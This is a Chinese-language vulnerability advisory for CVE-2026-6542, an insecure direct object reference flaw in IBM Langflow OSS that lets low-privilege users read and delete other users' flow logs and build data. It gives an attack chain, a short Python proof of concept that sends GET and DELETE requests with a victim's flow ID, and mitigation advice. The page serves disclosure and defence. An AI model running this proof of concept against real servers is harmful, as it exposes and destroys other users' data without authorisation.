CVE-2026-6542 CVSS 6.5 中危

CVE-2026-6542 IBM Langflow OSS越权访问漏洞

披露日期: 2026-04-30

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-6542

漏洞类型

越权访问 (IDOR)

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

IBM Langflow OSS

漏洞概述

IBM Langflow OSS 1.0.0至1.8.4版本存在严重的越权访问漏洞。由于系统未正确验证用户对flow_id的所有权，经过身份认证的低权限攻击者可以通过提供特定的flow_id，读取其他用户的交易日志和顶点构建数据。此外，攻击者还可以利用该漏洞删除其他用户流的持久化顶点构建数据，导致数据泄露及数据完整性受损。

技术细节

该漏洞属于典型的不安全的直接对象引用（IDOR）。在IBM Langflow OSS的实现中，API端点接受用户提供的flow_id作为参数来检索或修改资源，但服务器端未在执行操作前验证当前请求的用户是否拥有该flow_id对应资源的访问权限。攻击者只需拥有一个有效的低权限账户，即可通过遍历或猜测flow_id，向受影响的API端点发送请求。这使得攻击者能够绕过业务逻辑层面的隔离，非法访问或删除存储在系统中的其他用户的敏感数据，包括交易日志和组件构建数据。

攻击链分析

STEP 1

1. 获取凭证

攻击者注册或获取一个普通低权限用户账户，并获取有效的会话Token。

STEP 2

2. 识别目标ID

攻击者通过枚举、猜测或通过其他途径获取目标用户的flow_id（流ID）。

STEP 3

3. 发起越权读取

攻击者构造包含目标flow_id的API请求，携带自己的Token发送给服务器，读取交易日志和构建数据。

STEP 4

4. 发起越权删除

攻击者发送DELETE请求至相关端点，利用相同的IDOR漏洞删除受害者的持久化数据。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL configuration
target_host = "http://vulnerable-langflow-server:5000"
attacker_cookie = "session_id_of_low_priv_user"
victim_flow_id = "uuid_of_victim_flow"

headers = {
    "Cookie": f"session={attacker_cookie}",
    "Content-Type": "application/json"
}

# 1. Exploit: Read transaction logs and vertex build data
# The API fails to check if the attacker owns victim_flow_id
read_logs_url = f"{target_host}/api/v1/flows/{victim_flow_id}/logs"
response = requests.get(read_logs_url, headers=headers)

if response.status_code == 200:
    print("[+] Successfully exfiltrated victim's transaction logs:")
    print(response.text)
else:
    print("[-] Failed to read logs")

# 2. Exploit: Delete persisted vertex build data
# The API allows deletion of data owned by another user
delete_data_url = f"{target_host}/api/v1/flows/{victim_flow_id}/data"
del_response = requests.delete(delete_data_url, headers=headers)

if del_response.status_code == 200:
    print("[+] Successfully deleted victim's persisted vertex build data")
else:
    print("[-] Failed to delete data")

影响范围

IBM Langflow OSS 1.0.0 - 1.8.4

防御指南

临时缓解措施

在未升级修复前，建议通过网络访问控制列表（ACL）严格限制对Langflow管理后台和API接口的访问权限，仅允许可信的内网IP或管理IP访问。同时，应启用详细的审计日志，监控针对flow_id的异常读取或删除操作。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-6542
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-6542
3 Details https://www.cvedetails.com/cve/CVE-2026-6542/
4 VulDB https://vuldb.com/cve/CVE-2026-6542
5 Link https://www.ibm.com/support/pages/node/7270886

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表